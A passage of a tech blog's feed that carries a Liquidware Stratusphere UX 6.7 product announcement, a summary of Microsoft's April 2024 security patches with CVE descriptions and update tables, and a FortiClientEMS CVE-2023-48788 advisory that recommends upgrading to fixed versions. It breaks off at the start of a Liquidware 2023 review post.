<figure class="wp-block-image size-full"><img src="data:image/svg+xml,%3Csvg%20xmlns=%27http://www.w3.org/2000/svg%27%20width='400'%20height='131'%20viewBox=%270%200%20400%20131%27%3E%3C/svg%3E" loading="lazy" data-lazy="1" decoding="async" width="400" height="131" data-tf-src="http://www.ervik.as/wp-content/uploads/2022/03/liquidware-logo.png" alt="Liquidware Announces Stratusphere UX 6.7, Delivering Enhanced DEX" class="tf_svg_lazy wp-image-15155" data-tf-srcset="https://www.ervik.as/wp-content/uploads/2022/03/liquidware-logo.png 400w, https://www.ervik.as/wp-content/uploads/2022/03/liquidware-logo-300x98.png 300w" data-tf-sizes="(max-width: 400px) 100vw, 400px" /><noscript><img decoding="async" width="400" height="131" data-tf-not-load src="http://www.ervik.as/wp-content/uploads/2022/03/liquidware-logo.png" alt="Liquidware Announces Stratusphere UX 6.7, Delivering Enhanced DEX" class="wp-image-15155" srcset="https://www.ervik.as/wp-content/uploads/2022/03/liquidware-logo.png 400w, https://www.ervik.as/wp-content/uploads/2022/03/liquidware-logo-300x98.png 300w" sizes="(max-width: 400px) 100vw, 400px" /></noscript></figure>



<h2 class="wp-block-heading"><a href="https://www.liquidware.com/products/stratusphere-ux" target="_blank" data-type="link" data-id="https://www.liquidware.com/products/stratusphere-ux" rel="noreferrer noopener">Liquidware</a>, a leader in Digital Employee Experience ( DEX ) solutions for digital workspaces, today announced the release of Stratusphere<img loading="lazy" decoding="async" width="72" height="72" src="https://s.w.org/images/core/emoji/17.0.2/72x72/2122.png" alt="™" class="wp-smiley" style="height: 1em; max-height: 1em;" /> UX 6.7. </h2>



<p>This latest version delivers a range of new features designed to improve the overall employee experience and empower IT professionals with deeper insights into workplace productivity.</p>



<p><strong>Redesigned UI<br></strong><a href="https://www.ervik.as/category/user-virtualization/liquidware/">Stratusphere</a> UX 6.7 boasts a redesigned User Interface (UI) that prioritizes user experience. The streamlined interface offers improved clarity and ease of navigation, allowing employees to access the tools and resources they need more efficiently.</p>



<p><strong>DEX User Sentiment Surveys<br></strong>Understanding employee sentiment is crucial for optimizing the digital workspace. Stratusphere UX 6.7 introduces DEX User Sentiment Surveys, a new feature that enables IT teams to gather valuable feedback directly from employees. By incorporating user feedback into decision-making processes, organizations can ensure that their DEX strategy aligns with the needs and preferences of their workforce.</p>



<p><strong>Logoff Breakdown<br></strong>Stratusphere UX 6.7 also provides IT professionals with granular insights into logoff breakdowns. We collect all the processes, events, status, errors, and group policies that allow a deep view of any potential bottlenecks at logoff. This level of insight is invaluable for troubleshooting and issue resolution.</p>



<p><strong>CommandCTRL Integration<br></strong>For organizations leveraging Liquidware&#8217;s real-time remediation solution, CommandCTRL<img loading="lazy" decoding="async" width="72" height="72" src="https://s.w.org/images/core/emoji/17.0.2/72x72/2122.png" alt="™" class="wp-smiley" style="height: 1em; max-height: 1em;" />, Stratusphere UX 6.7 now offers seamless integration. This integration empowers IT admins to access real-time metrics and a suite of remediation tools for quicker resolution of incidents, reducing downtime and ensuring users are more productive.</p>



<p>“We are incredibly proud of this release, which enhances our DEX offering and keeps us at the forefront of DEX solutions,” said Jason Mattox, CTO of Liquidware. “This release of Stratusphere UX is designed to address key challenges faced by enterprises globally, empowering organizations to deliver a superior digital experience for their employees.”</p>



<p>As a leading provider of DEX solutions that empower organizations to deliver a frustration-free digital work experience for their employees, Liquidware offers a comprehensive suite of solutions&nbsp; — including Stratusphere UX — that enable IT professionals to monitor, troubleshoot, and optimize the digital workspace, ensuring that employees have the resources they need to be productive and successful.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Microsoft April 2024 security updates</title>
		<link>https://www.ervik.as/microsoft-april-2024-security-updates/</link>
		
		<dc:creator><![CDATA[Alexander Ervik Johnsen]]></dc:creator>
		<pubDate>Tue, 16 Apr 2024 13:56:34 +0000</pubDate>
				<category><![CDATA[Cyber Security]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[patch]]></category>
		<category><![CDATA[security update]]></category>
		<guid isPermaLink="false">https://www.ervik.as/?p=24730</guid>

					<description><![CDATA[On April 9, 2024, Microsoft published their April 2024 security updates with patches for 150 vulnerabilities. Among these vulnerabilities,&#160;Arctic Wolf has highlighted five vulnerabilities in this bulletin, which have either been exploited in the wild or labeled as critical severity by Microsoft.&#160; Notably, of the 150 patched vulnerabilities, 67 were remote code execution vulnerabilities. However, [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fwww.ervik.as%2Fmicrosoft-april-2024-security-updates%2F&amp;linkname=Microsoft%20April%202024%20security%20updates" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_bluesky" href="https://www.addtoany.com/add_to/bluesky?linkurl=https%3A%2F%2Fwww.ervik.as%2Fmicrosoft-april-2024-security-updates%2F&amp;linkname=Microsoft%20April%202024%20security%20updates" title="Bluesky" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fwww.ervik.as%2Fmicrosoft-april-2024-security-updates%2F&amp;linkname=Microsoft%20April%202024%20security%20updates" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_x" href="https://www.addtoany.com/add_to/x?linkurl=https%3A%2F%2Fwww.ervik.as%2Fmicrosoft-april-2024-security-updates%2F&amp;linkname=Microsoft%20April%202024%20security%20updates" title="X" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fwww.ervik.as%2Fmicrosoft-april-2024-security-updates%2F&amp;linkname=Microsoft%20April%202024%20security%20updates" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fwww.ervik.as%2Fmicrosoft-april-2024-security-updates%2F&amp;linkname=Microsoft%20April%202024%20security%20updates" title="Email" rel="nofollow noopener" target="_blank"></a></p>
<figure class="wp-block-image size-full"><img src="data:image/svg+xml,%3Csvg%20xmlns=%27http://www.w3.org/2000/svg%27%20width='600'%20height='600'%20viewBox=%270%200%20600%20600%27%3E%3C/svg%3E" loading="lazy" data-lazy="1" decoding="async" width="600" height="300" data-tf-src="http://www.ervik.as/wp-content/uploads/2024/04/critical-security-alert.webp" alt="Microsoft April 2024 security updates" class="tf_svg_lazy wp-image-24601" data-tf-srcset="https://www.ervik.as/wp-content/uploads/2024/04/critical-security-alert.webp 600w, https://www.ervik.as/wp-content/uploads/2024/04/critical-security-alert-300x150.webp 300w" data-tf-sizes="(max-width: 600px) 100vw, 600px" /><noscript><img decoding="async" width="600" height="300" data-tf-not-load src="http://www.ervik.as/wp-content/uploads/2024/04/critical-security-alert.webp" alt="Microsoft April 2024 security updates" class="wp-image-24601" srcset="https://www.ervik.as/wp-content/uploads/2024/04/critical-security-alert.webp 600w, https://www.ervik.as/wp-content/uploads/2024/04/critical-security-alert-300x150.webp 300w" sizes="(max-width: 600px) 100vw, 600px" /></noscript></figure>



<p>On April 9, 2024, Microsoft published their April 2024 security updates with patches for 150 vulnerabilities. Among these vulnerabilities,&nbsp;<strong>Arctic Wolf has highlighted five vulnerabilities in this bulletin</strong>, which have either been exploited in the wild or labeled as critical severity by Microsoft.&nbsp;</p>



<p>Notably, of the 150 patched vulnerabilities, 67 were remote code execution vulnerabilities. However, due to various prerequisites for exploitation, the vulnerability severities did not rise to critical severity.&nbsp;</p>



<h2 class="wp-block-heading">Impacted Product #1: Windows</h2>



<figure class="wp-block-table"><table><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26234" target="_blank" rel="noreferrer noopener"><strong>CVE-2024-26234</strong></a>&nbsp;</td><td><strong>CVSS: 6.7 – Medium</strong>&nbsp;<strong>MS Severity: Important</strong>&nbsp;</td><td><strong>Exploitation Detected</strong>&nbsp;</td></tr><tr><td colspan="3"><strong>Proxy Driver Spoofing Vulnerability</strong>&nbsp;– In at least&nbsp;<a href="https://news.sophos.com/en-us/2024/04/09/smoke-and-screen-mirrors-a-strange-signed-backdoor/" target="_blank" rel="noreferrer noopener">one intrusion</a>, threat actors leveraged this vulnerability to abuse Microsoft Windows Hardware Compatibility Program (WHCP) and deploy a malicious executable signed with a valid Microsoft Hardware Publisher Certificate.&nbsp;</td></tr></tbody></table></figure>



<figure class="wp-block-table"><table><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-24932" target="_blank" rel="noreferrer noopener"><strong>CVE-2023-24932</strong></a>&nbsp;</td><td><strong>CVSS: 6.7 – Medium</strong>&nbsp;<strong>MS Severity: Important</strong>&nbsp;</td><td><strong>Exploitation Detected</strong>&nbsp;</td></tr><tr><td colspan="3"><strong>Secure Boot Security Feature Bypass Vulnerability</strong>&nbsp;– An exploited Secure Boot Security Feature Bypass vulnerability. A threat actor must have physical access or admin rights to install an affected boot policy to the target system. Successful exploitation, which requires admin credentials on the device, could bypass Secure Boot. Microsoft disclosed that this vulnerability was used by threat actors to install the Black Lotus UEFI bootkit.&nbsp;This update coincides with Microsoft’s update schedule and their evaluation phase, adding three additional boot manager mitigation controls.&nbsp;A control to deploy the “Windows UEFI CA 2023” certificate to the Secure Boot DB to add trust for Windows boot managers signed by this certificate. Note that the “Windows UEFI CA 2023” certificate might have been installed by an earlier Windows update.&nbsp;A control to deploy a boot manager signed by the “Windows UEFI CA 2023” certificate.&nbsp;A control to add the “Windows Production PCA 2011” to the Secure Boot DBX which will block all Windows boot managers signed by this certificate.&nbsp;Additional updates tied to CVE-2023-24932:&nbsp;The ability to enable mitigation deployment in stages independently to allow more control in deploying the mitigations in your environment based on your needs.&nbsp;The mitigations are interlocked so that they cannot be deployed in the incorrect order.&nbsp;Additional events to know the status of devices as they apply the mitigations. See <a href="https://support.microsoft.com/kb/5016061" target="_blank" rel="noreferrer noopener">KB5016061</a>&nbsp;for more details on the events.&nbsp;Based on Microsoft’s update schedule, the next update and final deployment phase will come on July 9, 2024, or later.&nbsp;</td></tr></tbody></table></figure>



<h2 class="wp-block-heading">Impacted Product #2: Microsoft Defender for IoT</h2>



<figure class="wp-block-table"><table><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2024-29053" target="_blank" rel="noreferrer noopener"><strong>CVE-2024-29053</strong></a>&nbsp;</td><td><strong>CVSS: 8.8 – High</strong>&nbsp;<strong>MS Severity: Critical</strong>&nbsp;</td><td><strong>No Exploitation Detected</strong>&nbsp;</td></tr><tr><td colspan="3"><strong>Microsoft Defender for IoT Remote Code Execution Vulnerability</strong>&nbsp;– Path traversal vulnerability that could lead to remote code execution. An authenticated threat actor with access to the file upload feature could successfully exploit this vulnerability and obtain remote code execution by uploading malicious files to sensitive locations on the vulnerable server.&nbsp;</td></tr></tbody></table></figure>



<figure class="wp-block-table"><table><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2024-21323" target="_blank" rel="noreferrer noopener"><strong>CVE-2024-21323</strong></a>&nbsp;</td><td><strong>CVSS: 8.8 – High</strong>&nbsp;<strong>MS Severity: Critical</strong>&nbsp;</td><td><strong>No Exploitation Detected</strong>&nbsp;</td></tr><tr><td colspan="3"><strong>Microsoft Defender for IoT Remote Code Execution Vulnerability</strong>&nbsp;– Path traversal vulnerability that could lead to remote code execution. An authenticated threat actor, with permissions to send update packages to the Defender IoT sensor, could successfully exploit this vulnerability and obtain remote code execution by sending a tar file to the Defender IoT sensor. After the extraction process completed, the attacker could send unsigned update packages and overwrite any file.&nbsp;</td></tr></tbody></table></figure>



<figure class="wp-block-table"><table><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2024-21322" target="_blank" rel="noreferrer noopener"><strong>CVE-2024-21322</strong></a>&nbsp;</td><td><strong>CVSS: 7.2 – High</strong>&nbsp;<strong>MS Severity: Critical</strong>&nbsp;</td><td><strong>No Exploitation Detected</strong>&nbsp;</td></tr><tr><td colspan="3"><strong>Microsoft Defender for IoT Remote Code Execution Vulnerability</strong>&nbsp;– Command injection vulnerability that could lead to remote code execution. Due to improper neutralization of special elements used in a command, a threat actor with administrator privileges to the web application, could leverage command injection to obtain remote code execution.&nbsp;</td></tr></tbody></table></figure>



<p><em>Arctic Wolf will follow its standard internal processes to assess the impact of the newly reported vulnerabilities within its own environment and if impacted, will address them within the established remediation timelines in our Security Patching Policy. </em>&nbsp;</p>



<h2 class="wp-block-heading">Recommendations for CVE-2024-26234 for Windows and CVE-2024-29053</h2>



<h3 class="wp-block-heading">Recommendation: Apply Security Updates to Impacted Products</h3>



<p>CVE-2023-24932 was previously patched in a separate Patch Tuesday (May 2023). However, Microsoft added Windows 11 version 23H2 to the updated products list. Arctic Wolf has elected not to add the May 2023 reference article and update links to this table to ensure clarity around patching the most recent vulnerabilities reported by Microsoft.&nbsp;</p>



<figure class="wp-block-table"><table><tbody><tr><td><strong>Product</strong>&nbsp;</td><td><strong>Vulnerability</strong>&nbsp;</td><td><strong>Reference Article</strong>&nbsp;</td><td><strong>Update</strong>&nbsp;</td></tr><tr><td>Windows Server 2022, 23H2 Edition&nbsp;</td><td>CVE-2023-24932, CVE-2024-26234&nbsp;</td><td><a href="https://support.microsoft.com/help/5036910" target="_blank" rel="noreferrer noopener">5036910</a>&nbsp;</td><td><a href="https://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB5036910" target="_blank" rel="noreferrer noopener">Security Update</a>&nbsp;</td></tr><tr><td>Windows Server 2022&nbsp;</td><td>CVE-2023-24932, CVE-2024-26234&nbsp;</td><td><a href="https://support.microsoft.com/help/5036909" target="_blank" rel="noreferrer noopener">5036909</a>&nbsp;</td><td><a href="https://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB5036909" target="_blank" rel="noreferrer noopener">Security Update</a>&nbsp;</td></tr><tr><td>Windows Server 2019&nbsp;</td><td>CVE-2023-24932, CVE-2024-26234&nbsp;</td><td><a href="https://support.microsoft.com/help/5036896" target="_blank" rel="noreferrer noopener">5036896 </a>&nbsp;</td><td><a href="https://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB5036896" target="_blank" rel="noreferrer noopener">Security Update</a>&nbsp;</td></tr><tr><td>Windows Server 2016&nbsp;</td><td>CVE-2023-24932, CVE-2024-26234&nbsp;</td><td><a href="https://support.microsoft.com/help/5036899" target="_blank" rel="noreferrer noopener">5036899</a>&nbsp;</td><td><a href="https://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB5036899" target="_blank" rel="noreferrer noopener">Security Update</a>&nbsp;</td></tr><tr><td>Windows Server 2012 R2&nbsp;</td><td>CVE-2023-24932, CVE-2024-26234&nbsp;</td><td><a href="https://support.microsoft.com/help/5036960" target="_blank" rel="noreferrer noopener">5036960</a>&nbsp;</td><td><a href="https://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB5036960" target="_blank" rel="noreferrer noopener">Monthly Rollup</a>&nbsp;</td></tr><tr><td>Windows Server 2012&nbsp;</td><td>CVE-2023-24932, CVE-2024-26234&nbsp;</td><td><a href="https://support.microsoft.com/help/5036969" target="_blank" rel="noreferrer noopener">5036969</a>&nbsp;</td><td><a href="https://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB5036969" target="_blank" rel="noreferrer noopener">Monthly Rollup</a>&nbsp;</td></tr><tr><td>Windows Server 2008 Service Pack 2&nbsp;</td><td>CVE-2023-24932, CVE-2024-26234&nbsp;</td><td><a href="https://support.microsoft.com/help/5036932" target="_blank" rel="noreferrer noopener">5036932</a>&nbsp;<a href="https://support.microsoft.com/help/5036950" target="_blank" rel="noreferrer noopener">5036950</a>&nbsp;</td><td><a href="https://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB5036932" target="_blank" rel="noreferrer noopener">Monthly Rollup</a>&nbsp;<a href="https://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB5036950" target="_blank" rel="noreferrer noopener">Security Only</a>&nbsp;</td></tr><tr><td>Windows Server 2008 R2 Service Pack 1&nbsp;</td><td>CVE-2023-24932, CVE-2024-26234&nbsp;</td><td><a href="https://support.microsoft.com/help/5036967" target="_blank" rel="noreferrer noopener">5036967</a>&nbsp;<a href="https://support.microsoft.com/help/5036922" target="_blank" rel="noreferrer noopener">5036922</a>&nbsp;</td><td><a href="https://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB5036967" target="_blank" rel="noreferrer noopener">Monthly Rollup</a>&nbsp;<a href="https://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB5036922" target="_blank" rel="noreferrer noopener">Security Only</a>&nbsp;</td></tr><tr><td>Windows 11 version 21H2&nbsp;</td><td>CVE-2023-24932, CVE-2024-26234&nbsp;</td><td><a href="https://support.microsoft.com/help/5036894" target="_blank" rel="noreferrer noopener">5036894</a>&nbsp;</td><td><a href="https://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB5036894" target="_blank" rel="noreferrer noopener">Security Update</a>&nbsp;</td></tr><tr><td>Windows 11 Version 23H2&nbsp;</td><td>CVE-2023-24932, CVE-2024-26234&nbsp;</td><td><a href="https://support.microsoft.com/help/5036893" target="_blank" rel="noreferrer noopener">5036893</a>&nbsp;</td><td><a href="https://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB5036893" target="_blank" rel="noreferrer noopener">Security Update</a>&nbsp;</td></tr><tr><td>Windows 11 Version 22H2&nbsp;</td><td>CVE-2023-24932, CVE-2024-26234&nbsp;</td><td><a href="https://support.microsoft.com/help/5036893" target="_blank" rel="noreferrer noopener">5036893</a>&nbsp;</td><td><a href="https://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB5036893" target="_blank" rel="noreferrer noopener">Security Update</a>&nbsp;</td></tr><tr><td>Windows 10&nbsp;</td><td>CVE-2023-24932, CVE-2024-26234&nbsp;</td><td><a href="https://support.microsoft.com/help/5036925" target="_blank" rel="noreferrer noopener">5036925</a>&nbsp;</td><td><a href="https://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB5036925" target="_blank" rel="noreferrer noopener">Security Update</a>&nbsp;</td></tr><tr><td>Windows 10 Version 22H2&nbsp;</td><td>CVE-2023-24932, CVE-2024-26234&nbsp;</td><td><a href="https://support.microsoft.com/help/5036892" target="_blank" rel="noreferrer noopener">5036892</a>&nbsp;</td><td><a href="https://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB5036892" target="_blank" rel="noreferrer noopener">Security Update</a>&nbsp;</td></tr><tr><td>Windows 10 Version 21H2&nbsp;</td><td>CVE-2023-24932, CVE-2024-26234&nbsp;</td><td><a href="https://support.microsoft.com/help/5036892" target="_blank" rel="noreferrer noopener">5036892</a>&nbsp;</td><td><a href="https://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB5036892" target="_blank" rel="noreferrer noopener">Security Update</a>&nbsp;</td></tr><tr><td>Windows 10 Version 1809&nbsp;</td><td>CVE-2023-24932, CVE-2024-26234&nbsp;</td><td><a href="https://support.microsoft.com/help/5036896" target="_blank" rel="noreferrer noopener">5036896 </a>&nbsp;</td><td><a href="https://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB5036896" target="_blank" rel="noreferrer noopener">Security Update</a>&nbsp;</td></tr><tr><td>Windows 10 Version 1607&nbsp;</td><td>CVE-2023-24932, CVE-2024-26234&nbsp;</td><td><a href="https://support.microsoft.com/help/5036899" target="_blank" rel="noreferrer noopener">5036899</a>&nbsp;</td><td><a href="https://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB5036899" target="_blank" rel="noreferrer noopener">Security Update</a>&nbsp;</td></tr><tr><td>Microsoft Defender for IoT&nbsp;</td><td>CVE-2024-21322, CVE-2024-21323, CVE-2024-29053.&nbsp;</td><td><a href="https://learn.microsoft.com/en-us/azure/defender-for-iot/organizations/release-notes#versions-241x" target="_blank" rel="noreferrer noopener">Release Notes</a>&nbsp;</td><td><a href="https://docs.microsoft.com/en-us/azure/defender-for-iot/organizations/how-to-manage-the-on-premises-management-console#update-the-software-version" target="_blank" rel="noreferrer noopener">Security Update</a>&nbsp;</td></tr></tbody></table></figure>



<h3 class="wp-block-heading"><strong>Additional steps are required to mitigate CVE-2023-24932.</strong>&nbsp;</h3>



<ul class="wp-block-list">
<li>Microsoft added Windows 11 version 23H2 for x64-based systems and Windows 11 version 23H2 for ARM-based systems to the update table because the April 2024 security updates provide the latest mitigations.&nbsp;<strong>These mitigations are off by default.</strong>&nbsp;Customers who should take additional steps to implement security mitigations for a publicly disclosed Secure Boot bypass leveraged by the BlackLotus UEFI bootkit and who would like to take a proactive security stance or to begin preparing for the rollout, please refer to&nbsp;<a href="https://support.microsoft.com/help/5025885" target="_blank" rel="noreferrer noopener">KB5025885</a>.&nbsp;</li>
</ul>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Active Exploitation and PoC for Critical RCE in Fortinet FortiClientEMS Observed</title>
		<link>https://www.ervik.as/active-exploitation-and-poc-for-critical-rce-in-fortinet-forticlientems-observed/</link>
		
		<dc:creator><![CDATA[Alexander Ervik Johnsen]]></dc:creator>
		<pubDate>Fri, 05 Apr 2024 12:04:27 +0000</pubDate>
				<category><![CDATA[Cyber Security]]></category>
		<category><![CDATA[CVE-2023-48788]]></category>
		<category><![CDATA[Fortinet]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">https://www.ervik.as/?p=24599</guid>

					<description><![CDATA[On March 21, 2024, security researchers published a technical analysis along with a proof of concept (PoC) regarding the critical Remote Code Execution (RCE) vulnerability, CVE-2023-48788, in Fortinet’s FortiClientEMS. This vulnerability enables an unauthenticated threat actor to achieve RCE through the manipulation of SQL commands.&#160; Fortinet has stated that this vulnerability is under active exploitation. [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fwww.ervik.as%2Factive-exploitation-and-poc-for-critical-rce-in-fortinet-forticlientems-observed%2F&amp;linkname=Active%20Exploitation%20and%20PoC%20for%20Critical%20RCE%20in%20Fortinet%20FortiClientEMS%20Observed" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_bluesky" href="https://www.addtoany.com/add_to/bluesky?linkurl=https%3A%2F%2Fwww.ervik.as%2Factive-exploitation-and-poc-for-critical-rce-in-fortinet-forticlientems-observed%2F&amp;linkname=Active%20Exploitation%20and%20PoC%20for%20Critical%20RCE%20in%20Fortinet%20FortiClientEMS%20Observed" title="Bluesky" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fwww.ervik.as%2Factive-exploitation-and-poc-for-critical-rce-in-fortinet-forticlientems-observed%2F&amp;linkname=Active%20Exploitation%20and%20PoC%20for%20Critical%20RCE%20in%20Fortinet%20FortiClientEMS%20Observed" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_x" href="https://www.addtoany.com/add_to/x?linkurl=https%3A%2F%2Fwww.ervik.as%2Factive-exploitation-and-poc-for-critical-rce-in-fortinet-forticlientems-observed%2F&amp;linkname=Active%20Exploitation%20and%20PoC%20for%20Critical%20RCE%20in%20Fortinet%20FortiClientEMS%20Observed" title="X" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fwww.ervik.as%2Factive-exploitation-and-poc-for-critical-rce-in-fortinet-forticlientems-observed%2F&amp;linkname=Active%20Exploitation%20and%20PoC%20for%20Critical%20RCE%20in%20Fortinet%20FortiClientEMS%20Observed" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fwww.ervik.as%2Factive-exploitation-and-poc-for-critical-rce-in-fortinet-forticlientems-observed%2F&amp;linkname=Active%20Exploitation%20and%20PoC%20for%20Critical%20RCE%20in%20Fortinet%20FortiClientEMS%20Observed" title="Email" rel="nofollow noopener" target="_blank"></a></p>
<figure class="wp-block-image size-full"><img src="data:image/svg+xml,%3Csvg%20xmlns=%27http://www.w3.org/2000/svg%27%20width='600'%20height='600'%20viewBox=%270%200%20600%20600%27%3E%3C/svg%3E" loading="lazy" data-lazy="1" decoding="async" width="600" height="300" data-tf-src="http://www.ervik.as/wp-content/uploads/2024/04/critical-security-alert.webp" alt="RCE" class="tf_svg_lazy wp-image-24601" data-tf-srcset="https://www.ervik.as/wp-content/uploads/2024/04/critical-security-alert.webp 600w, https://www.ervik.as/wp-content/uploads/2024/04/critical-security-alert-300x150.webp 300w" data-tf-sizes="(max-width: 600px) 100vw, 600px" /><noscript><img decoding="async" width="600" height="300" data-tf-not-load src="http://www.ervik.as/wp-content/uploads/2024/04/critical-security-alert.webp" alt="RCE" class="wp-image-24601" srcset="https://www.ervik.as/wp-content/uploads/2024/04/critical-security-alert.webp 600w, https://www.ervik.as/wp-content/uploads/2024/04/critical-security-alert-300x150.webp 300w" sizes="(max-width: 600px) 100vw, 600px" /></noscript></figure>



<h3 class="wp-block-heading">On March 21, 2024, security researchers published a technical analysis along with a proof of concept (PoC) regarding the critical Remote Code Execution (RCE) vulnerability, CVE-2023-48788, in Fortinet’s FortiClientEMS. This vulnerability enables an unauthenticated threat actor to achieve RCE through the manipulation of SQL commands.&nbsp;</h3>



<p>Fortinet has stated that this vulnerability is under active exploitation. PoC exploit code is also now publicly available. While threat actors have not previously targeted FortiClientEMS, several other Fortinet products have been historically targeted such as FortiOS through&nbsp;<a href="https://arcticwolf.com/resources/blog/cve-2024-21762-and-cve-2024-23113/" target="_blank" rel="noopener">CVE-2024-21762 and CVE-2024-23113</a>&nbsp;back in February 2024.&nbsp;</p>



<h2 class="wp-block-heading">Recommendation&nbsp;for CVE-2023-48788</h2>



<h3 class="wp-block-heading">Upgrade Fortinet FortiClientEMS to Fixed Version</h3>



<p>Arctic Wolf&nbsp;<strong>strongly recommends</strong>&nbsp;upgrading Fortinet FortiClientEMS to the latest version<em>.&nbsp;</em>&nbsp;</p>



<figure class="wp-block-table"><table><tbody><tr><td><strong>Product</strong>&nbsp;</td><td><strong>Affected Version</strong>&nbsp;</td><td><strong>Fixed Version</strong>&nbsp;</td></tr><tr><td rowspan="2">FortiClientEMS&nbsp;</td><td>7.2.0 to 7.2.2&nbsp;</td><td>7.2.3 or above&nbsp;</td></tr><tr><td>7.0.1 to 7.0.10&nbsp;</td><td>7.0.11 or above&nbsp;</td></tr></tbody></table></figure>



<p>Please follow your organization’s patching and testing guidelines to avoid operational impact. </p>



<p><a href="https://arcticwolf.com/resources/blog/cve-2023-48788/" target="_blank" data-type="link" data-id="https://arcticwolf.com/resources/blog/cve-2023-48788/" rel="noreferrer noopener">More inf</a><a href="https://arcticwolf.com/resources/blog/cve-2023-48788/" data-type="link" data-id="https://arcticwolf.com/resources/blog/cve-2023-48788/" target="_blank" rel="noopener">o here</a></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Liquidware Continues to Define the DEX Landscape: A Year of Pioneering Achievements in 2023</title>
		<link>https://www.ervik.as/liquidware-continues-to-define-the-dex-landscape-a-year-of-pioneering-achievements-in-2023/</link>
		
		<dc:creator><![CDATA[Alexander Ervik Johnsen]]></dc:creator>
		<pubDate>Tue, 06 Feb 2024 15:29:30 +0000</pubDate>
				<category><![CDATA[Liquidware]]></category>
		<category><![CDATA[AVD]]></category>
		<category><![CDATA[Azure AVD]]></category>
		<category><![CDATA[Citrix]]></category>
		<category><![CDATA[CommandCTRL]]></category>
		<category><![CDATA[DEX]]></category>
		<category><![CDATA[EUC]]></category>
		<category><![CDATA[FlexApp]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[ProfileUnity]]></category>
		<category><![CDATA[VDI]]></category>
		<category><![CDATA[VMware]]></category>
		<guid isPermaLink="false">https://www.ervik.as/?p=24523</guid>

					<description><![CDATA[Liquidware, a recognized authority in Digital Employee Experience ( DEX ) solutions for digital workspaces, proudly announces a year of exceptional growth and continued innovation. The company celebrates a 74% increase in Annual Recurring Revenue (ARR) and an 80% growth in enterprise adoption of its FlexApp technology.  Liquidware offers the most comprehensive DEX coverage compared [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fwww.ervik.as%2Fliquidware-continues-to-define-the-dex-landscape-a-year-of-pioneering-achievements-in-2023%2F&amp;linkname=Liquidware%20Continues%20to%20Define%20the%20DEX%20Landscape%3A%20A%20Year%20of%20Pioneering%20Achievements%20in%202023" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_bluesky" href="https://www.addtoany.com/add_to/bluesky?linkurl=https%3A%2F%2Fwww.ervik.as%2Fliquidware-continues-to-define-the-dex-landscape-a-year-of-pioneering-achievements-in-2023%2F&amp;linkname=Liquidware%20Continues%20to%20Define%20the%20DEX%20Landscape%3A%20A%20Year%20of%20Pioneering%20Achievements%20in%202023" title="Bluesky" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fwww.ervik.as%2Fliquidware-continues-to-define-the-dex-landscape-a-year-of-pioneering-achievements-in-2023%2F&amp;linkname=Liquidware%20Continues%20to%20Define%20the%20DEX%20Landscape%3A%20A%20Year%20of%20Pioneering%20Achievements%20in%202023" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_x" 